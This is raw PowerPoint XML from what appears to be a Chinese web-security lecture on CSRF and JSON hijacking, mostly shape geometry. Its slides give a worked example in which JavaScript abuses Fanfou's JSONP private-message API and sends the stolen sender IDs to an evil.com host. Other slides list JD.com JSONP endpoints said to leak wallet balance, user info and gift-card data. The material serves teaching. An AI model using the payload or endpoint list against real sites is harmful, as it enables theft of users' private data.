                <a:gd name="T10" fmla="*/ 19 w 19"/>
                <a:gd name="T11" fmla="*/ 2 h 23"/>
                <a:gd name="T12" fmla="*/ 3 w 19"/>
                <a:gd name="T13" fmla="*/ 23 h 23"/>
                <a:gd name="T14" fmla="*/ 2 w 19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3">
                  <a:moveTo>
                    <a:pt x="2" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="23"/>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="23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0"/>
                    <a:pt x="19" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="19" y="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2" y="23"/>
                    <a:pt x="2" y="23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0" name="Freeform 109"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5203825" y="5122863"/>
              <a:ext cx="119063" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 16"/>
                <a:gd name="T1" fmla="*/ 17 h 17"/>
                <a:gd name="T2" fmla="*/ 0 w 16"/>
                <a:gd name="T3" fmla="*/ 17 h 17"/>
                <a:gd name="T4" fmla="*/ 1 w 16"/>
                <a:gd name="T5" fmla="*/ 15 h 17"/>
                <a:gd name="T6" fmla="*/ 13 w 16"/>
                <a:gd name="T7" fmla="*/ 1 h 17"/>
                <a:gd name="T8" fmla="*/ 16 w 16"/>
                <a:gd name="T9" fmla="*/ 1 h 17"/>
                <a:gd name="T10" fmla="*/ 16 w 16"/>
                <a:gd name="T11" fmla="*/ 3 h 17"/>
                <a:gd name="T12" fmla="*/ 6 w 16"/>
                <a:gd name="T13" fmla="*/ 14 h 17"/>
                <a:gd name="T14" fmla="*/ 6 w 16"/>
                <a:gd name="T15" fmla="*/ 14 h 17"/>
                <a:gd name="T16" fmla="*/ 5 w 16"/>
                <a:gd name="T17" fmla="*/ 16 h 17"/>
                <a:gd name="T18" fmla="*/ 2 w 16"/>
                <a:gd name="T19" fmla="*/ 17 h 17"/>
                <a:gd name="T20" fmla="*/ 2 w 16"/>
                <a:gd name="T2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7">
                  <a:moveTo>
                    <a:pt x="2" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="17"/>
                    <a:pt x="1" y="17"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="1" y="15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6" y="1"/>
                    <a:pt x="16" y="2"/>
                    <a:pt x="16" y="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6"/>
                    <a:pt x="5" y="16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1" name="Freeform 110"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5203825" y="5191126"/>
              <a:ext cx="141288" cy="149225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 19"/>
                <a:gd name="T1" fmla="*/ 20 h 20"/>
                <a:gd name="T2" fmla="*/ 1 w 19"/>
                <a:gd name="T3" fmla="*/ 20 h 20"/>
                <a:gd name="T4" fmla="*/ 0 w 19"/>
                <a:gd name="T5" fmla="*/ 18 h 20"/>
                <a:gd name="T6" fmla="*/ 9 w 19"/>
                <a:gd name="T7" fmla="*/ 8 h 20"/>
                <a:gd name="T8" fmla="*/ 16 w 19"/>
                <a:gd name="T9" fmla="*/ 1 h 20"/>
                <a:gd name="T10" fmla="*/ 18 w 19"/>
                <a:gd name="T11" fmla="*/ 0 h 20"/>
                <a:gd name="T12" fmla="*/ 18 w 19"/>
                <a:gd name="T13" fmla="*/ 2 h 20"/>
                <a:gd name="T14" fmla="*/ 12 w 19"/>
                <a:gd name="T15" fmla="*/ 10 h 20"/>
                <a:gd name="T16" fmla="*/ 3 w 19"/>
                <a:gd name="T17" fmla="*/ 20 h 20"/>
                <a:gd name="T18" fmla="*/ 1 w 19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20">
                  <a:moveTo>
                    <a:pt x="1" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="20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2" y="15"/>
                    <a:pt x="6" y="11"/>
                    <a:pt x="9" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="5"/>
                    <a:pt x="14" y="2"/>
                    <a:pt x="16" y="1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8" y="1"/>
                    <a:pt x="19" y="2"/>
                    <a:pt x="18" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="4"/>
                    <a:pt x="14" y="7"/>
                    <a:pt x="12" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="13"/>
                    <a:pt x="5" y="17"/>
                    <a:pt x="3" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="20"/>
                    <a:pt x="2" y="20"/>
                    <a:pt x="1" y="2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2" name="Freeform 111"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5195888" y="5287963"/>
              <a:ext cx="134938" cy="173038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 18"/>
                <a:gd name="T1" fmla="*/ 23 h 23"/>
                <a:gd name="T2" fmla="*/ 0 w 18"/>
                <a:gd name="T3" fmla="*/ 23 h 23"/>
                <a:gd name="T4" fmla="*/ 0 w 18"/>
                <a:gd name="T5" fmla="*/ 20 h 23"/>
                <a:gd name="T6" fmla="*/ 1 w 18"/>
                <a:gd name="T7" fmla="*/ 19 h 23"/>
                <a:gd name="T8" fmla="*/ 8 w 18"/>
                <a:gd name="T9" fmla="*/ 10 h 23"/>
                <a:gd name="T10" fmla="*/ 15 w 18"/>
                <a:gd name="T11" fmla="*/ 0 h 23"/>
                <a:gd name="T12" fmla="*/ 18 w 18"/>
                <a:gd name="T13" fmla="*/ 0 h 23"/>
                <a:gd name="T14" fmla="*/ 18 w 18"/>
                <a:gd name="T15" fmla="*/ 2 h 23"/>
                <a:gd name="T16" fmla="*/ 10 w 18"/>
                <a:gd name="T17" fmla="*/ 12 h 23"/>
                <a:gd name="T18" fmla="*/ 4 w 18"/>
                <a:gd name="T19" fmla="*/ 21 h 23"/>
                <a:gd name="T20" fmla="*/ 3 w 18"/>
                <a:gd name="T21" fmla="*/ 22 h 23"/>
                <a:gd name="T22" fmla="*/ 2 w 18"/>
                <a:gd name="T23" fmla="*/ 23 h 23"/>
                <a:gd name="T24" fmla="*/ 2 w 18"/>
                <a:gd name="T2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3">
                  <a:moveTo>
                    <a:pt x="2" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="0" y="23"/>
                    <a:pt x="0" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="21"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="20"/>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="16"/>
                    <a:pt x="6" y="13"/>
                    <a:pt x="8" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="7"/>
                    <a:pt x="13" y="4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8" y="1"/>
                    <a:pt x="18" y="2"/>
                    <a:pt x="18" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="6"/>
                    <a:pt x="13" y="9"/>
                    <a:pt x="10" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="15"/>
                    <a:pt x="6" y="17"/>
                    <a:pt x="4" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="21"/>
                    <a:pt x="3" y="22"/>
                    <a:pt x="3" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3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3" name="Freeform 112"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5218113" y="5408613"/>
              <a:ext cx="112713" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 15"/>
                <a:gd name="T1" fmla="*/ 18 h 18"/>
                <a:gd name="T2" fmla="*/ 0 w 15"/>
                <a:gd name="T3" fmla="*/ 18 h 18"/>
                <a:gd name="T4" fmla="*/ 0 w 15"/>
                <a:gd name="T5" fmla="*/ 16 h 18"/>
                <a:gd name="T6" fmla="*/ 12 w 15"/>
                <a:gd name="T7" fmla="*/ 0 h 18"/>
                <a:gd name="T8" fmla="*/ 14 w 15"/>
                <a:gd name="T9" fmla="*/ 0 h 18"/>
                <a:gd name="T10" fmla="*/ 15 w 15"/>
                <a:gd name="T11" fmla="*/ 2 h 18"/>
                <a:gd name="T12" fmla="*/ 3 w 15"/>
                <a:gd name="T13" fmla="*/ 18 h 18"/>
                <a:gd name="T14" fmla="*/ 1 w 15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1" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="18"/>
                    <a:pt x="1" y="18"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="17"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="11"/>
                    <a:pt x="9" y="6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1"/>
                    <a:pt x="15" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="7"/>
                    <a:pt x="7" y="13"/>
                    <a:pt x="3" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="18"/>
                    <a:pt x="2" y="18"/>
                    <a:pt x="1" y="18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4" name="Freeform 113"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5211763" y="5497513"/>
              <a:ext cx="119063" cy="150813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 16"/>
                <a:gd name="T1" fmla="*/ 20 h 20"/>
                <a:gd name="T2" fmla="*/ 1 w 16"/>
                <a:gd name="T3" fmla="*/ 20 h 20"/>
                <a:gd name="T4" fmla="*/ 1 w 16"/>
                <a:gd name="T5" fmla="*/ 18 h 20"/>
                <a:gd name="T6" fmla="*/ 13 w 16"/>
                <a:gd name="T7" fmla="*/ 0 h 20"/>
                <a:gd name="T8" fmla="*/ 15 w 16"/>
                <a:gd name="T9" fmla="*/ 0 h 20"/>
                <a:gd name="T10" fmla="*/ 15 w 16"/>
                <a:gd name="T11" fmla="*/ 2 h 20"/>
                <a:gd name="T12" fmla="*/ 3 w 16"/>
                <a:gd name="T13" fmla="*/ 20 h 20"/>
                <a:gd name="T14" fmla="*/ 2 w 16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0">
                  <a:moveTo>
                    <a:pt x="2" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="20"/>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="1" y="18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5" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="16" y="1"/>
                    <a:pt x="15" y="2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2" y="20"/>
                    <a:pt x="2" y="2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5" name="Freeform 114"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5195888" y="5610226"/>
              <a:ext cx="134938" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 18"/>
                <a:gd name="T1" fmla="*/ 21 h 21"/>
                <a:gd name="T2" fmla="*/ 0 w 18"/>
                <a:gd name="T3" fmla="*/ 21 h 21"/>
                <a:gd name="T4" fmla="*/ 0 w 18"/>
                <a:gd name="T5" fmla="*/ 19 h 21"/>
                <a:gd name="T6" fmla="*/ 15 w 18"/>
                <a:gd name="T7" fmla="*/ 0 h 21"/>
                <a:gd name="T8" fmla="*/ 17 w 18"/>
                <a:gd name="T9" fmla="*/ 0 h 21"/>
                <a:gd name="T10" fmla="*/ 17 w 18"/>
                <a:gd name="T11" fmla="*/ 2 h 21"/>
                <a:gd name="T12" fmla="*/ 5 w 18"/>
                <a:gd name="T13" fmla="*/ 18 h 21"/>
                <a:gd name="T14" fmla="*/ 4 w 18"/>
                <a:gd name="T15" fmla="*/ 20 h 21"/>
                <a:gd name="T16" fmla="*/ 2 w 18"/>
                <a:gd name="T17" fmla="*/ 21 h 21"/>
                <a:gd name="T18" fmla="*/ 1 w 18"/>
                <a:gd name="T1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1">
                  <a:moveTo>
                    <a:pt x="1" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="20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1"/>
                    <a:pt x="18" y="2"/>
                    <a:pt x="17" y="2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19"/>
                    <a:pt x="4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1" y="2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6" name="Freeform 115"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5211763" y="5700713"/>
              <a:ext cx="127000" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 17"/>
                <a:gd name="T1" fmla="*/ 23 h 23"/>
                <a:gd name="T2" fmla="*/ 1 w 17"/>
                <a:gd name="T3" fmla="*/ 22 h 23"/>
                <a:gd name="T4" fmla="*/ 1 w 17"/>
                <a:gd name="T5" fmla="*/ 19 h 23"/>
                <a:gd name="T6" fmla="*/ 14 w 17"/>
                <a:gd name="T7" fmla="*/ 1 h 23"/>
                <a:gd name="T8" fmla="*/ 16 w 17"/>
                <a:gd name="T9" fmla="*/ 1 h 23"/>
                <a:gd name="T10" fmla="*/ 17 w 17"/>
                <a:gd name="T11" fmla="*/ 3 h 23"/>
                <a:gd name="T12" fmla="*/ 4 w 17"/>
                <a:gd name="T13" fmla="*/ 20 h 23"/>
                <a:gd name="T14" fmla="*/ 4 w 17"/>
                <a:gd name="T15" fmla="*/ 22 h 23"/>
                <a:gd name="T16" fmla="*/ 3 w 17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3" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="23"/>
                    <a:pt x="2" y="22"/>
                    <a:pt x="1" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="22"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="1" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="13"/>
                    <a:pt x="10" y="7"/>
                    <a:pt x="14" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="16" y="0"/>
                    <a:pt x="16" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="1"/>
                    <a:pt x="17" y="2"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="8"/>
                    <a:pt x="8" y="14"/>
                    <a:pt x="4" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="21"/>
                    <a:pt x="4" y="22"/>
                    <a:pt x="4" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="23"/>
                    <a:pt x="3" y="23"/>
                    <a:pt x="3" y="23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52108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945" y="1377950"/>
            <a:ext cx="3754120" cy="3818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504190" y="503555"/>
            <a:ext cx="8921115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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSON HiJacking攻击例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="1311275"/>
            <a:ext cx="6913880" cy="8102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饭否的private_messages API可以显示用户私信内容</a:t>
            </a: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http://api.fanfou.com/private_messages/inbox.json?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callback=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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自定义函数名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&amp;count=私信数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例子：http://api.fanfou.com/private_messages/inbox.json?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callback=hijack&amp;count=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="2366010"/>
            <a:ext cx="6913880" cy="36880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自定义一个JSON HiJacking页面，包含如下JavaScript代码：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&lt;script&gt;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function hijack(o) { // 自定义的劫持函数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var i = 0;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var data = '';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for (i; i &lt; 3; i++) {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data += o[i].sender_id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}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alert(data);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new Image().src = "http://www.evil.com/JSONHiJack.php?hi=" + escape(data);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// 将获取到的隐私数据上传到攻击者服务器上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}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&lt;/script&gt;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&lt;script src=http://api.fanfou.com/private_messages/inbox.json?callback=hijack&amp;count=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&gt;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&lt;/script&gt;&lt;!--api调用中使用的callback函数为hijack--&gt;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allAtOnce" bldLvl="0" animBg="1"/>
      <p:bldP spid="4" grpId="0" uiExpand="1" build="allAtOnce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504190" y="503555"/>
            <a:ext cx="8921115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CSRF跨站请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSON HiJacking攻击例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6602095" y="1150620"/>
            <a:ext cx="4807585" cy="48875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当登录饭否的用户被欺骗访问这个页面时，其隐私将暴露无遗。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第一个&lt;script&gt;标签内的脚本是我们自定义的劫持函数 hijack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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第二个&lt;script&gt;标签加载饭否的private_messages API，这个加载过程实际上是发出了一个CSRF GET请求，请求带上了登录用户的Cookie身份认证信息</a:t>
            </a:r>
            <a:r>
              <a:rPr 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返回的数据如下：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hijack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([{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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"id": 585904,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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"text": "...",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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"sender_id": "Salina_Wu",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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"recipient_id": "ycosxhack",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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"created_at": "Sat May 31 05:00:01 +0000 2008",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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"sender_screen_name": "LOLO",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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"recipient_screen_name": "余弦"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}])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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返回的数据被当做 JavaScript 代码而被解析执行，这时就会执行这个 hijack 函数，参数就是上面hijack()中的这段JSON数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125730" y="1150620"/>
            <a:ext cx="6306820" cy="48875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自定义一个JSON HiJacking页面，包含如下JavaScript代码：</a:t>
            </a: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&lt;script&gt;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function hijack(o) {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// 自定义的劫持函数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var i = 0;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var data = '';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for (i; i &lt; 3; i++) {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data += o[i].sender_id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}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alert(data);</a:t>
            </a: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new Image().src = "http://www.evil.com/JSONHiJack.php?hi=" + escape(data);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// 将获取到的隐私数据上传到攻击者服务器上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}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&lt;/script&gt;</a:t>
            </a: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&lt;script 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src=http://api.fanfou.com/private_messages/inbox.json?callback=hijack&amp;count=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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&gt;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&lt;/script&gt;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&lt;!--api调用中使用的callback函数为hijack--&gt;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667701" y="2019388"/>
            <a:ext cx="4406705" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="3885350" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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0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1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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7" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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sz="160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泄露客户端IP</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="da-DK" altLang="zh-CN" kern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8" name="组合 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5746820" y="2015192"/>
            <a:ext cx="4406705" cy="663786"/>
            <a:chOff x="826350" y="3169425"/>
            <a:chExt cx="3885350" cy="585343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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9" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US" sz="16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泄露钱包余额</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="da-DK" altLang="zh-CN" sz="1600" kern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0" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="667701" y="3838871"/>
            <a:ext cx="4422196" cy="777068"/>
            <a:chOff x="826350" y="3069530"/>
            <a:chExt cx="3899008" cy="685238"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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0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3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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32" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1550358" y="3069530"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US" sz="16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泄露用户信息，用户昵称，pin，电话等</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5746820" y="3815389"/>
            <a:ext cx="4406705" cy="785483"/>
            <a:chOff x="826350" y="3062109"/>
            <a:chExt cx="3885350" cy="692659"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="826350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0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4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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35" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3062109"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US" sz="1600" kern="0" dirty="0" smtClean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泄露礼品卡信息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1368425" y="2428875"/>
            <a:ext cx="40690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https://wq.jd.com/mcoss/jdlocate/</a:t>
            </a:r>
            <a:r>
              <a:rPr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setlocation</a:t>
            </a:r>
            <a:r>
              <a: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?calltype=1&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr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callback=sssss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="2447290"/>
            <a:ext cx="479679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https://wq.jd.com/user/info/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QueryWalletBalance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?_=1515479686839&amp;sceneval=2&amp;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callback=aaaaa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&amp;g_tk=817407019&amp;g_ty=ls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1369060" y="4319905"/>
            <a:ext cx="414337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https://wq.jd.com/user/info/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QueryJDUserInfo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?sceneid=80027&amp;_=1515479680293&amp;sceneval=2&amp;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callback=aaaaaa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&amp;g_tk=817407019&amp;g_ty=ls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480810" y="4319270"/>
            <a:ext cx="437959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sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>https://wq.jd.com/user/info/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1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GetCommCardInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0" smtClean="0">
